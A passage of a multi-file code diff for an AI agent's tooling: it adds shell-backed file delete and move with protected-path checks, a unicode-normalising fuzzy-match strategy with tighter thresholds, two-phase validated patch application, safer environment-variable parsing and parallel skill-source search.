error="Binary file — cannot display as text."
|
||||
)
|
||||
cat_result = self._exec(f"cat {self._escape_shell_arg(path)}")
|
||||
if cat_result.exit_code != 0:
|
||||
return ReadResult(error=f"Failed to read file: {cat_result.stdout}")
|
||||
return ReadResult(content=cat_result.stdout, file_size=file_size)
|
||||
|
||||
def delete_file(self, path: str) -> WriteResult:
|
||||
"""Delete a file via rm."""
|
||||
path = self._expand_path(path)
|
||||
if _is_write_denied(path):
|
||||
return WriteResult(error=f"Delete denied: {path} is a protected path")
|
||||
result = self._exec(f"rm -f {self._escape_shell_arg(path)}")
|
||||
if result.exit_code != 0:
|
||||
return WriteResult(error=f"Failed to delete {path}: {result.stdout}")
|
||||
return WriteResult()
|
||||
|
||||
def move_file(self, src: str, dst: str) -> WriteResult:
|
||||
"""Move a file via mv."""
|
||||
src = self._expand_path(src)
|
||||
dst = self._expand_path(dst)
|
||||
for p in (src, dst):
|
||||
if _is_write_denied(p):
|
||||
return WriteResult(error=f"Move denied: {p} is a protected path")
|
||||
result = self._exec(
|
||||
f"mv {self._escape_shell_arg(src)} {self._escape_shell_arg(dst)}"
|
||||
)
|
||||
if result.exit_code != 0:
|
||||
return WriteResult(error=f"Failed to move {src} -> {dst}: {result.stdout}")
|
||||
return WriteResult()
|
||||
|
||||
# =========================================================================
|
||||
# WRITE Implementation
|
||||
# =========================================================================
|
||||
|
||||
|
||||
def write_file(self, path: str, content: str) -> WriteResult:
|
||||
"""
|
||||
Write content to a file, creating parent directories as needed.
|
||||
@@ -656,7 +728,7 @@ class ShellFileOperations(FileOperations):
|
||||
# Import and use fuzzy matching
|
||||
from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
|
||||
new_content, match_count, error = fuzzy_find_and_replace(
|
||||
new_content, match_count, _strategy, error = fuzzy_find_and_replace(
|
||||
content, old_string, new_string, replace_all
|
||||
)
|
||||
|
||||
|
||||
+107
-23
@@ -21,7 +21,7 @@ Multi-occurrence matching is handled via the replace_all flag.
|
||||
Usage:
|
||||
from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
|
||||
new_content, match_count, error = fuzzy_find_and_replace(
|
||||
new_content, match_count, strategy, error = fuzzy_find_and_replace(
|
||||
content="def foo():\\n pass",
|
||||
old_string="def foo():",
|
||||
new_string="def bar():",
|
||||
@@ -48,27 +48,27 @@ def _unicode_normalize(text: str) -> str:
|
||||
|
||||
|
||||
def fuzzy_find_and_replace(content: str, old_string: str, new_string: str,
|
||||
replace_all: bool = False) -> Tuple[str, int, Optional[str]]:
|
||||
replace_all: bool = False) -> Tuple[str, int, Optional[str], Optional[str]]:
|
||||
"""
|
||||
Find and replace text using a chain of increasingly fuzzy matching strategies.
|
||||
|
||||
|
||||
Args:
|
||||
content: The file content to search in
|
||||
old_string: The text to find
|
||||
new_string: The replacement text
|
||||
replace_all: If True, replace all occurrences; if False, require uniqueness
|
||||
|
||||
|
||||
Returns:
|
||||
Tuple of (new_content, match_count, error_message)
|
||||
- If successful: (modified_content, number_of_replacements, None)
|
||||
- If failed: (original_content, 0, error_description)
|
||||
Tuple of (new_content, match_count, strategy_name, error_message)
|
||||
- If successful: (modified_content, number_of_replacements, strategy_used, None)
|
||||
- If failed: (original_content, 0, None, error_description)
|
||||
"""
|
||||
if not old_string:
|
||||
return content, 0, "old_string cannot be empty"
|
||||
|
||||
return content, 0, None, "old_string cannot be empty"
|
||||
|
||||
if old_string == new_string:
|
||||
return content, 0, "old_string and new_string are identical"
|
||||
|
||||
return content, 0, None, "old_string and new_string are identical"
|
||||
|
||||
# Try each matching strategy in order
|
||||
strategies: List[Tuple[str, Callable]] = [
|
||||
("exact", _strategy_exact),
|
||||
@@ -77,27 +77,28 @@ def fuzzy_find_and_replace(content: str, old_string: str, new_string: str,
|
||||
("indentation_flexible", _strategy_indentation_flexible),
|
||||
("escape_normalized", _strategy_escape_normalized),
|
||||
("trimmed_boundary", _strategy_trimmed_boundary),
|
||||
("unicode_normalized", _strategy_unicode_normalized),
|
||||
("block_anchor", _strategy_block_anchor),
|
||||
("context_aware", _strategy_context_aware),
|
||||
]
|
||||
|
||||
for _strategy_name, strategy_fn in strategies:
|
||||
|
||||
for strategy_name, strategy_fn in strategies:
|
||||
matches = strategy_fn(content, old_string)
|
||||
|
||||
|
||||
if matches:
|
||||
# Found matches with this strategy
|
||||
if len(matches) > 1 and not replace_all:
|
||||
return content, 0, (
|
||||
return content, 0, None, (
|
||||
f"Found {len(matches)} matches for old_string. "
|
||||
f"Provide more context to make it unique, or use replace_all=True."
|
||||
)
|
||||
|
||||
|
||||
# Perform replacement
|
||||
new_content = _apply_replacements(content, matches, new_string)
|
||||
return new_content, len(matches), None
|
||||
|
||||
return new_content, len(matches), strategy_name, None
|
||||
|
||||
# No strategy found a match
|
||||
return content, 0, "Could not find a match for old_string in the file"
|
||||
return content, 0, None, "Could not find a match for old_string in the file"
|
||||
|
||||
|
||||
def _apply_replacements(content: str, matches: List[Tuple[int, int]], new_string: str) -> str:
|
||||
@@ -258,9 +259,90 @@ def _strategy_trimmed_boundary(content: str, pattern: str) -> List[Tuple[int, in
|
||||
return matches
|
||||
|
||||
|
||||
def _build_orig_to_norm_map(original: str) -> List[int]:
|
||||
"""Build a list mapping each original character index to its normalized index.
|
||||
|
||||
Because UNICODE_MAP replacements may expand characters (e.g. em-dash → '--',
|
||||
ellipsis → '...'), the normalised string can be longer than the original.
|
||||
This map lets us convert positions in the normalised string back to the
|
||||
corresponding positions in the original string.
|
||||
|
||||
Returns a list of length ``len(original) + 1``; entry ``i`` is the
|
||||
normalised index that character ``i`` maps to.
|
||||
"""
|
||||
result: List[int] = []
|
||||
norm_pos = 0
|
||||
for char in original:
|
||||
result.append(norm_pos)
|
||||
repl = UNICODE_MAP.get(char)
|
||||
norm_pos += len(repl) if repl is not None else 1
|
||||
result.append(norm_pos) # sentinel: one past the last character
|
||||
return result
|
||||
|
||||
|
||||
def _map_positions_norm_to_orig(
|
||||
orig_to_norm: List[int],
|
||||
norm_matches: List[Tuple[int, int]],
|
||||
) -> List[Tuple[int, int]]:
|
||||
"""Convert (start, end) positions in the normalised string to original positions."""
|
||||
# Invert the map: norm_pos -> first original position with that norm_pos
|
||||
norm_to_orig_start: dict[int, int] = {}
|
||||
for orig_pos, norm_pos in enumerate(orig_to_norm[:-1]):
|
||||
if norm_pos not in norm_to_orig_start:
|
||||
norm_to_orig_start[norm_pos] = orig_pos
|
||||
|
||||
results: List[Tuple[int, int]] = []
|
||||
orig_len = len(orig_to_norm) - 1 # number of original characters
|
||||
|
||||
for norm_start, norm_end in norm_matches:
|
||||
if norm_start not in norm_to_orig_start:
|
||||
continue
|
||||
orig_start = norm_to_orig_start[norm_start]
|
||||
|
||||
# Walk forward until orig_to_norm[orig_end] >= norm_end
|
||||
orig_end = orig_start
|
||||
while orig_end < orig_len and orig_to_norm[orig_end] < norm_end:
|
||||
orig_end += 1
|
||||
|
||||
results.append((orig_start, orig_end))
|
||||
|
||||
return results
|
||||
|
||||
|
||||
def _strategy_unicode_normalized(content: str, pattern: str) -> List[Tuple[int, int]]:
|
||||
"""Strategy 7: Unicode normalisation.
|
||||
|
||||
Normalises smart quotes, em/en-dashes, ellipsis, and non-breaking spaces
|
||||
to their ASCII equivalents in both *content* and *pattern*, then runs
|
||||
exact and line_trimmed matching on the normalised copies.
|
||||
|
||||
Positions are mapped back to the *original* string via
|
||||
``_build_orig_to_norm_map`` — necessary because some UNICODE_MAP
|
||||
replacements expand a single character into multiple ASCII characters,
|
||||
making a naïve position copy incorrect.
|
||||
"""
|
||||
# Normalize both sides. Either the content or the pattern (or both) may
|
||||
# carry unicode variants — e.g. content has an em-dash that should match
|
||||
# the LLM's ASCII '--', or vice-versa. Skip only when neither changes.
|
||||
norm_pattern = _unicode_normalize(pattern)
|
||||
norm_content = _unicode_normalize(content)
|
||||
if norm_content == content and norm_pattern == pattern:
|
||||
return []
|
||||
|
||||
norm_matches = _strategy_exact(norm_content, norm_pattern)
|
||||
if not norm_matches:
|
||||
norm_matches = _strategy_line_trimmed(norm_content, norm_pattern)
|
||||
|
||||
if not norm_matches:
|
||||
return []
|
||||
|
||||
orig_to_norm = _build_orig_to_norm_map(content)
|
||||
return _map_positions_norm_to_orig(orig_to_norm, norm_matches)
|
||||
|
||||
|
||||
def _strategy_block_anchor(content: str, pattern: str) -> List[Tuple[int, int]]:
|
||||
"""
|
||||
Strategy 7: Match by anchoring on first and last lines.
|
||||
Strategy 8: Match by anchoring on first and last lines.
|
||||
Adjusted with permissive thresholds and unicode normalization.
|
||||
"""
|
||||
# Normalize both strings for comparison while keeping original content for offset calculation
|
||||
@@ -290,8 +372,10 @@ def _strategy_block_anchor(content: str, pattern: str) -> List[Tuple[int, int]]:
|
||||
matches = []
|
||||
candidate_count = len(potential_matches)
|
||||
|
||||
# Thresholding logic: 0.10 for unique matches (max flexibility), 0.30 for multiple candidates
|
||||
threshold = 0.10 if candidate_count == 1 else 0.30
|
||||
# Thresholding logic: 0.50 for unique matches, 0.70 for multiple candidates.
|
||||
# Previous values (0.10 / 0.30) were dangerously loose — a 10% middle-section
|
||||
# similarity could match completely unrelated blocks.
|
||||
threshold = 0.50 if candidate_count == 1 else 0.70
|
||||
|
||||
for i in potential_matches:
|
||||
if pattern_line_count <= 2:
|
||||
@@ -314,7 +398,7 @@ def _strategy_block_anchor(content: str, pattern: str) -> List[Tuple[int, int]]:
|
||||
|
||||
def _strategy_context_aware(content: str, pattern: str) -> List[Tuple[int, int]]:
|
||||
"""
|
||||
Strategy 8: Line-by-line similarity with 50% threshold.
|
||||
Strategy 9: Line-by-line similarity with 50% threshold.
|
||||
|
||||
Finds blocks where at least 50% of lines have high similarity.
|
||||
"""
|
||||
|
||||
+2
-1
@@ -2160,6 +2160,7 @@ def _kill_orphaned_mcp_children() -> None:
|
||||
Only kills PIDs tracked in ``_stdio_pids`` — never arbitrary children.
|
||||
"""
|
||||
import signal as _signal
|
||||
kill_signal = getattr(_signal, "SIGKILL", _signal.SIGTERM)
|
||||
|
||||
with _lock:
|
||||
pids = list(_stdio_pids)
|
||||
@@ -2167,7 +2168,7 @@ def _kill_orphaned_mcp_children() -> None:
|
||||
|
||||
for pid in pids:
|
||||
try:
|
||||
os.kill(pid, _signal.SIGKILL)
|
||||
os.kill(pid, kill_signal)
|
||||
logger.debug("Force-killed orphaned MCP stdio process %d", pid)
|
||||
except (ProcessLookupError, PermissionError, OSError):
|
||||
pass # Already exited or inaccessible
|
||||
|
||||
+201
-76
@@ -28,6 +28,7 @@ Usage:
|
||||
result = apply_v4a_operations(operations, file_ops)
|
||||
"""
|
||||
|
||||
import difflib
|
||||
import re
|
||||
from dataclasses import dataclass, field
|
||||
from typing import List, Optional, Tuple, Any
|
||||
@@ -202,31 +203,162 @@ def parse_v4a_patch(patch_content: str) -> Tuple[List[PatchOperation], Optional[
|
||||
if current_hunk and current_hunk.lines:
|
||||
current_op.hunks.append(current_hunk)
|
||||
operations.append(current_op)
|
||||
|
||||
|
||||
# Validate the parsed result
|
||||
if not operations:
|
||||
# Empty patch is not an error — callers get [] and can decide
|
||||
return operations, None
|
||||
|
||||
parse_errors: List[str] = []
|
||||
for op in operations:
|
||||
if not op.file_path:
|
||||
parse_errors.append("Operation with empty file path")
|
||||
if op.operation == OperationType.UPDATE and not op.hunks:
|
||||
parse_errors.append(f"UPDATE {op.file_path!r}: no hunks found")
|
||||
if op.operation == OperationType.MOVE and not op.new_path:
|
||||
parse_errors.append(f"MOVE {op.file_path!r}: missing destination path (expected 'src -> dst')")
|
||||
|
||||
if parse_errors:
|
||||
return [], "Parse error: " + "; ".join(parse_errors)
|
||||
|
||||
return operations, None
|
||||
|
||||
|
||||
def apply_v4a_operations(operations: List[PatchOperation],
|
||||
file_ops: Any) -> 'PatchResult':
|
||||
def _count_occurrences(text: str, pattern: str) -> int:
|
||||
"""Count non-overlapping occurrences of *pattern* in *text*."""
|
||||
count = 0
|
||||
start = 0
|
||||
while True:
|
||||
pos = text.find(pattern, start)
|
||||
if pos == -1:
|
||||
break
|
||||
count += 1
|
||||
start = pos + 1
|
||||
return count
|
||||
|
||||
|
||||
def _validate_operations(
|
||||
operations: List[PatchOperation],
|
||||
file_ops: Any,
|
||||
) -> List[str]:
|
||||
"""Validate all operations without writing any files.
|
||||
|
||||
Returns a list of error strings; an empty list means all operations
|
||||
are valid and the apply phase can proceed safely.
|
||||
|
||||
For UPDATE operations, hunks are simulated in order so that later
|
||||
hunks validate against post-earlier-hunk content (matching apply order).
|
||||
"""
|
||||
Apply V4A patch operations using a file operations interface.
|
||||
|
||||
# Deferred import: breaks the patch_parser ↔ fuzzy_match circular dependency
|
||||
from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
|
||||
errors: List[str] = []
|
||||
|
||||
for op in operations:
|
||||
if op.operation == OperationType.UPDATE:
|
||||
read_result = file_ops.read_file_raw(op.file_path)
|
||||
if read_result.error:
|
||||
errors.append(f"{op.file_path}: {read_result.error}")
|
||||
continue
|
||||
|
||||
simulated = read_result.content
|
||||
for hunk in op.hunks:
|
||||
search_lines = [l.content for l in hunk.lines if l.prefix in (' ', '-')]
|
||||
if not search_lines:
|
||||
# Addition-only hunk: validate context hint uniqueness
|
||||
if hunk.context_hint:
|
||||
occurrences = _count_occurrences(simulated, hunk.context_hint)
|
||||
if occurrences == 0:
|
||||
errors.append(
|
||||
f"{op.file_path}: addition-only hunk context hint "
|
||||
f"'{hunk.context_hint}' not found"
|
||||
)
|
||||
elif occurrences > 1:
|
||||
errors.append(
|
||||
f"{op.file_path}: addition-only hunk context hint "
|
||||
f"'{hunk.context_hint}' is ambiguous "
|
||||
f"({occurrences} occurrences)"
|
||||
)
|
||||
continue
|
||||
|
||||
search_pattern = '\n'.join(search_lines)
|
||||
replace_lines = [l.content for l in hunk.lines if l.prefix in (' ', '+')]
|
||||
replacement = '\n'.join(replace_lines)
|
||||
|
||||
new_simulated, count, _strategy, match_error = fuzzy_find_and_replace(
|
||||
simulated, search_pattern, replacement, replace_all=False
|
||||
)
|
||||
if count == 0:
|
||||
label = f"'{hunk.context_hint}'" if hunk.context_hint else "(no hint)"
|
||||
errors.append(
|
||||
f"{op.file_path}: hunk {label} not found"
|
||||
+ (f" — {match_error}" if match_error else "")
|
||||
)
|
||||
else:
|
||||
# Advance simulation so subsequent hunks validate correctly.
|
||||
# Reuse the result from the call above — no second fuzzy run.
|
||||
simulated = new_simulated
|
||||
|
||||
elif op.operation == OperationType.DELETE:
|
||||
read_result = file_ops.read_file_raw(op.file_path)
|
||||
if read_result.error:
|
||||
errors.append(f"{op.file_path}: file not found for deletion")
|
||||
|
||||
elif op.operation == OperationType.MOVE:
|
||||
if not op.new_path:
|
||||
errors.append(f"{op.file_path}: MOVE operation missing destination path")
|
||||
continue
|
||||
src_result = file_ops.read_file_raw(op.file_path)
|
||||
if src_result.error:
|
||||
errors.append(f"{op.file_path}: source file not found for move")
|
||||
dst_result = file_ops.read_file_raw(op.new_path)
|
||||
if not dst_result.error:
|
||||
errors.append(
|
||||
f"{op.new_path}: destination already exists — move would overwrite"
|
||||
)
|
||||
|
||||
# ADD: parent directory creation handled by write_file; no pre-check needed.
|
||||
|
||||
return errors
|
||||
|
||||
|
||||
def apply_v4a_operations(operations: List[PatchOperation],
|
||||
file_ops: Any) -> 'PatchResult':
|
||||
"""Apply V4A patch operations using a file operations interface.
|
||||
|
||||
Uses a two-phase validate-then-apply approach:
|
||||
- Phase 1: validate all operations against current file contents without
|
||||
writing anything. If any validation error is found, return immediately
|
||||
with no filesystem changes.
|
||||
- Phase 2: apply all operations. A failure here (e.g. a race between
|
||||
validation and apply) is reported with a note to run ``git diff``.
|
||||
|
||||
Args:
|
||||
operations: List of PatchOperation from parse_v4a_patch
|
||||
file_ops: Object with read_file, write_file methods
|
||||
|
||||
file_ops: Object with read_file_raw, write_file methods
|
||||
|
||||
Returns:
|
||||
PatchResult with results of all operations
|
||||
"""
|
||||
# Import here to avoid circular imports
|
||||
from tools.file_operations import PatchResult
|
||||
|
||||
|
||||
# ---- Phase 1: validate ----
|
||||
validation_errors = _validate_operations(operations, file_ops)
|
||||
if validation_errors:
|
||||
return PatchResult(
|
||||
success=False,
|
||||
error="Patch validation failed (no files were modified):\n"
|
||||
+ "\n".join(f" • {e}" for e in validation_errors),
|
||||
)
|
||||
|
||||
# ---- Phase 2: apply ----
|
||||
files_modified = []
|
||||
files_created = []
|
||||
files_deleted = []
|
||||
all_diffs = []
|
||||
errors = []
|
||||
|
||||
|
||||
for op in operations:
|
||||
try:
|
||||
if op.operation == OperationType.ADD:
|
||||
@@ -236,7 +368,7 @@ def apply_v4a_operations(operations: List[PatchOperation],
|
||||
all_diffs.append(result[1])
|
||||
else:
|
||||
errors.append(f"Failed to add {op.file_path}: {result[1]}")
|
||||
|
||||
|
||||
elif op.operation == OperationType.DELETE:
|
||||
result = _apply_delete(op, file_ops)
|
||||
if result[0]:
|
||||
@@ -244,7 +376,7 @@ def apply_v4a_operations(operations: List[PatchOperation],
|
||||
all_diffs.append(result[1])
|
||||
else:
|
||||
errors.append(f"Failed to delete {op.file_path}: {result[1]}")
|
||||
|
||||
|
||||
elif op.operation == OperationType.MOVE:
|
||||
result = _apply_move(op, file_ops)
|
||||
if result[0]:
|
||||
@@ -252,7 +384,7 @@ def apply_v4a_operations(operations: List[PatchOperation],
|
||||
all_diffs.append(result[1])
|
||||
else:
|
||||
errors.append(f"Failed to move {op.file_path}: {result[1]}")
|
||||
|
||||
|
||||
elif op.operation == OperationType.UPDATE:
|
||||
result = _apply_update(op, file_ops)
|
||||
if result[0]:
|
||||
@@ -260,19 +392,19 @@ def apply_v4a_operations(operations: List[PatchOperation],
|
||||
all_diffs.append(result[1])
|
||||
else:
|
||||
errors.append(f"Failed to update {op.file_path}: {result[1]}")
|
||||
|
||||
|
||||
except Exception as e:
|
||||
errors.append(f"Error processing {op.file_path}: {str(e)}")
|
||||
|
||||
|
||||
# Run lint on all modified/created files
|
||||
lint_results = {}
|
||||
for f in files_modified + files_created:
|
||||
if hasattr(file_ops, '_check_lint'):
|
||||
lint_result = file_ops._check_lint(f)
|
||||
lint_results[f] = lint_result.to_dict()
|
||||
|
||||
|
||||
combined_diff = '\n'.join(all_diffs)
|
||||
|
||||
|
||||
if errors:
|
||||
return PatchResult(
|
||||
success=False,
|
||||
@@ -281,16 +413,17 @@ def apply_v4a_operations(operations: List[PatchOperation],
|
||||
files_created=files_created,
|
||||
files_deleted=files_deleted,
|
||||
lint=lint_results if lint_results else None,
|
||||
error='; '.join(errors)
|
||||
error="Apply phase failed (state may be inconsistent — run `git diff` to assess):\n"
|
||||
+ "\n".join(f" • {e}" for e in errors),
|
||||
)
|
||||
|
||||
|
||||
return PatchResult(
|
||||
success=True,
|
||||
diff=combined_diff,
|
||||
files_modified=files_modified,
|
||||
files_created=files_created,
|
||||
files_deleted=files_deleted,
|
||||
lint=lint_results if lint_results else None
|
||||
lint=lint_results if lint_results else None,
|
||||
)
|
||||
|
||||
|
||||
@@ -317,68 +450,56 @@ def _apply_add(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
|
||||
def _apply_delete(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
"""Apply a delete file operation."""
|
||||
# Read file first for diff
|
||||
read_result = file_ops.read_file(op.file_path)
|
||||
|
||||
if read_result.error and "not found" in read_result.error.lower():
|
||||
# File doesn't exist, nothing to delete
|
||||
return True, f"# {op.file_path} already deleted or doesn't exist"
|
||||
|
||||
# Delete directly via shell command using the underlying environment
|
||||
rm_result = file_ops._exec(f"rm -f {file_ops._escape_shell_arg(op.file_path)}")
|
||||
|
||||
if rm_result.exit_code != 0:
|
||||
return False, rm_result.stdout
|
||||
|
||||
diff = f"--- a/{op.file_path}\n+++ /dev/null\n# File deleted"
|
||||
return True, diff
|
||||
# Read before deleting so we can produce a real unified diff.
|
||||
# Validation already confirmed existence; this guards against races.
|
||||
read_result = file_ops.read_file_raw(op.file_path)
|
||||
if read_result.error:
|
||||
return False, f"Cannot delete {op.file_path}: file not found"
|
||||
|
||||
result = file_ops.delete_file(op.file_path)
|
||||
if result.error:
|
||||
return False, result.error
|
||||
|
||||
removed_lines = read_result.content.splitlines(keepends=True)
|
||||
diff = ''.join(difflib.unified_diff(
|
||||
removed_lines, [],
|
||||
fromfile=f"a/{op.file_path}",
|
||||
tofile="/dev/null",
|
||||
))
|
||||
return True, diff or f"# Deleted: {op.file_path}"
|
||||
|
||||
|
||||
def _apply_move(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
"""Apply a move file operation."""
|
||||
# Use shell mv command
|
||||
mv_result = file_ops._exec(
|
||||
f"mv {file_ops._escape_shell_arg(op.file_path)} {file_ops._escape_shell_arg(op.new_path)}"
|
||||
)
|
||||
|
||||
if mv_result.exit_code != 0:
|
||||
return False, mv_result.stdout
|
||||
|
||||
result = file_ops.move_file(op.file_path, op.new_path)
|
||||
if result.error:
|
||||
return False, result.error
|
||||
|
||||
diff = f"# Moved: {op.file_path} -> {op.new_path}"
|
||||
return True, diff
|
||||
|
||||
|
||||
def _apply_update(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
"""Apply an update file operation."""
|
||||
# Read current content
|
||||
read_result = file_ops.read_file(op.file_path, limit=10000)
|
||||
|
||||
# Deferred import: breaks the patch_parser ↔ fuzzy_match circular dependency
|
||||
from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
|
||||
# Read current content — raw so no line-number prefixes or per-line truncation
|
||||
read_result = file_ops.read_file_raw(op.file_path)
|
||||
|
||||
if read_result.error:
|
||||
return False, f"Cannot read file: {read_result.error}"
|
||||
|
||||
# Parse content (remove line numbers)
|
||||
current_lines = []
|
||||
for line in read_result.content.split('\n'):
|
||||
if re.match(r'^\s*\d+\|', line):
|
||||
# Line format: " 123|content"
|
||||
parts = line.split('|', 1)
|
||||
if len(parts) == 2:
|
||||
current_lines.append(parts[1])
|
||||
else:
|
||||
current_lines.append(line)
|
||||
else:
|
||||
current_lines.append(line)
|
||||
|
||||
current_content = '\n'.join(current_lines)
|
||||
|
||||
|
||||
current_content = read_result.content
|
||||
|
||||
# Apply each hunk
|
||||
new_content = current_content
|
||||
|
||||
|
||||
for hunk in op.hunks:
|
||||
# Build search pattern from context and removed lines
|
||||
search_lines = []
|
||||
replace_lines = []
|
||||
|
||||
|
||||
for line in hunk.lines:
|
||||
if line.prefix == ' ':
|
||||
search_lines.append(line.content)
|
||||
@@ -387,17 +508,15 @@ def _apply_update(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
search_lines.append(line.content)
|
||||
elif line.prefix == '+':
|
||||
replace_lines.append(line.content)
|
||||
|
||||
|
||||
if search_lines:
|
||||
search_pattern = '\n'.join(search_lines)
|
||||
replacement = '\n'.join(replace_lines)
|
||||
|
||||
# Use fuzzy matching
|
||||
from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
new_content, count, error = fuzzy_find_and_replace(
|
||||
|
||||
new_content, count, _strategy, error = fuzzy_find_and_replace(
|
||||
new_content, search_pattern, replacement, replace_all=False
|
||||
)
|
||||
|
||||
|
||||
if error and count == 0:
|
||||
# Try with context hint if available
|
||||
if hunk.context_hint:
|
||||
@@ -408,8 +527,8 @@ def _apply_update(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
window_start = max(0, hint_pos - 500)
|
||||
window_end = min(len(new_content), hint_pos + 2000)
|
||||
window = new_content[window_start:window_end]
|
||||
|
||||
window_new, count, error = fuzzy_find_and_replace(
|
||||
|
||||
window_new, count, _strategy, error = fuzzy_find_and_replace(
|
||||
window, search_pattern, replacement, replace_all=False
|
||||
)
|
||||
|
||||
@@ -424,16 +543,23 @@ def _apply_update(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
# Insert at the location indicated by the context hint, or at end of file.
|
||||
insert_text = '\n'.join(replace_lines)
|
||||
if hunk.context_hint:
|
||||
hint_pos = new_content.find(hunk.context_hint)
|
||||
if hint_pos != -1:
|
||||
occurrences = _count_occurrences(new_content, hunk.context_hint)
|
||||
if occurrences == 0:
|
||||
# Hint not found — append at end as a safe fallback
|
||||
new_content = new_content.rstrip('\n') + '\n' + insert_text + '\n'
|
||||
elif occurrences > 1:
|
||||
return False, (
|
||||
f"Addition-only hunk: context hint '{hunk.context_hint}' is ambiguous "
|
||||
f"({occurrences} occurrences) — provide a more unique hint"
|
||||
)
|
||||
else:
|
||||
hint_pos = new_content.find(hunk.context_hint)
|
||||
# Insert after the line containing the context hint
|
||||
eol = new_content.find('\n', hint_pos)
|
||||
if eol != -1:
|
||||
new_content = new_content[:eol + 1] + insert_text + '\n' + new_content[eol + 1:]
|
||||
else:
|
||||
new_content = new_content + '\n' + insert_text
|
||||
else:
|
||||
new_content = new_content.rstrip('\n') + '\n' + insert_text + '\n'
|
||||
else:
|
||||
new_content = new_content.rstrip('\n') + '\n' + insert_text + '\n'
|
||||
|
||||
@@ -443,7 +569,6 @@ def _apply_update(op: PatchOperation, file_ops: Any) -> Tuple[bool, str]:
|
||||
return False, write_result.error
|
||||
|
||||
# Generate diff
|
||||
import difflib
|
||||
diff_lines = difflib.unified_diff(
|
||||
current_content.splitlines(keepends=True),
|
||||
new_content.splitlines(keepends=True),
|
||||
|
||||
@@ -585,7 +585,10 @@ class ProcessRegistry:
|
||||
from tools.ansi_strip import strip_ansi
|
||||
from tools.terminal_tool import _interrupt_event
|
||||
|
||||
default_timeout = int(os.getenv("TERMINAL_TIMEOUT", "180"))
|
||||
try:
|
||||
default_timeout = int(os.getenv("TERMINAL_TIMEOUT", "180"))
|
||||
except (ValueError, TypeError):
|
||||
default_timeout = 180
|
||||
max_timeout = default_timeout
|
||||
requested_timeout = timeout
|
||||
timeout_note = None
|
||||
|
||||
@@ -212,7 +212,8 @@ def _handle_send(args):
|
||||
if isinstance(result, dict) and result.get("success") and mirror_text:
|
||||
try:
|
||||
from gateway.mirror import mirror_to_session
|
||||
source_label = os.getenv("HERMES_SESSION_PLATFORM", "cli")
|
||||
from gateway.session_context import get_session_env
|
||||
source_label = get_session_env("HERMES_SESSION_PLATFORM", "cli")
|
||||
if mirror_to_session(platform_name, chat_id, mirror_text, source_label=source_label, thread_id=thread_id):
|
||||
result["mirrored"] = True
|
||||
except Exception:
|
||||
@@ -689,7 +690,10 @@ async def _send_email(extra, chat_id, message):
|
||||
address = extra.get("address") or os.getenv("EMAIL_ADDRESS", "")
|
||||
password = os.getenv("EMAIL_PASSWORD", "")
|
||||
smtp_host = extra.get("smtp_host") or os.getenv("EMAIL_SMTP_HOST", "")
|
||||
smtp_port = int(os.getenv("EMAIL_SMTP_PORT", "587"))
|
||||
try:
|
||||
smtp_port = int(os.getenv("EMAIL_SMTP_PORT", "587"))
|
||||
except (ValueError, TypeError):
|
||||
smtp_port = 587
|
||||
|
||||
if not all([address, password, smtp_host]):
|
||||
return {"error": "Email not configured (EMAIL_ADDRESS, EMAIL_PASSWORD, EMAIL_SMTP_HOST required)"}
|
||||
@@ -1020,7 +1024,8 @@ async def _send_feishu(pconfig, chat_id, message, media_files=None, thread_id=No
|
||||
|
||||
def _check_send_message():
|
||||
"""Gate send_message on gateway running (always available on messaging platforms)."""
|
||||
platform = os.getenv("HERMES_SESSION_PLATFORM", "")
|
||||
from gateway.session_context import get_session_env
|
||||
platform = get_session_env("HERMES_SESSION_PLATFORM", "")
|
||||
if platform and platform != "local":
|
||||
return True
|
||||
try:
|
||||
|
||||
@@ -426,7 +426,7 @@ def _patch_skill(
|
||||
# from exact-match failures on minor formatting mismatches.
|
||||
from tools.fuzzy_match import fuzzy_find_and_replace
|
||||
|
||||
new_content, match_count, match_error = fuzzy_find_and_replace(
|
||||
new_content, match_count, _strategy, match_error = fuzzy_find_and_replace(
|
||||
content, old_string, new_string, replace_all
|
||||
)
|
||||
if match_error:
|
||||
|
||||
+85
-12
@@ -1788,7 +1788,10 @@ class ClawHubSource(SkillSource):
|
||||
follow_redirects=True,
|
||||
)
|
||||
if resp.status_code == 429:
|
||||
retry_after = int(resp.headers.get("retry-after", "5"))
|
||||
try:
|
||||
retry_after = int(resp.headers.get("retry-after", "5"))
|
||||
except (ValueError, TypeError):
|
||||
retry_after = 5
|
||||
retry_after = min(retry_after, 15) # Cap wait time
|
||||
logger.debug(
|
||||
"ClawHub download rate-limited for %s, retrying in %ds (attempt %d/%d)",
|
||||
@@ -2675,19 +2678,89 @@ def create_source_router(auth: Optional[GitHubAuth] = None) -> List[SkillSource]
|
||||
return sources
|
||||
|
||||
|
||||
def _search_one_source(
|
||||
src: SkillSource, query: str, limit: int
|
||||
) -> Tuple[str, List[SkillMeta]]:
|
||||
"""Search a single source. Runs in a thread for parallelism."""
|
||||
try:
|
||||
return src.source_id(), src.search(query, limit=limit)
|
||||
except Exception as e:
|
||||
logger.debug("Search failed for %s: %s", src.source_id(), e)
|
||||
return src.source_id(), []
|
||||
|
||||
|
||||
def parallel_search_sources(
|
||||
sources: List[SkillSource],
|
||||
query: str = "",
|
||||
per_source_limits: Optional[Dict[str, int]] = None,
|
||||
source_filter: str = "all",
|
||||
overall_timeout: float = 30,
|
||||
on_source_done: Optional[Any] = None,
|
||||
) -> Tuple[List[SkillMeta], Dict[str, int], List[str]]:
|
||||
"""Search all sources in parallel with per-source timeout.
|
||||
|
||||
Returns ``(all_results, source_counts, timed_out_ids)``.
|
||||
|
||||
*on_source_done* is an optional callback ``(source_id, count) -> None``
|
||||
invoked as each source completes — useful for progress indicators.
|
||||
"""
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
|
||||
per_source_limits = per_source_limits or {}
|
||||
|
||||
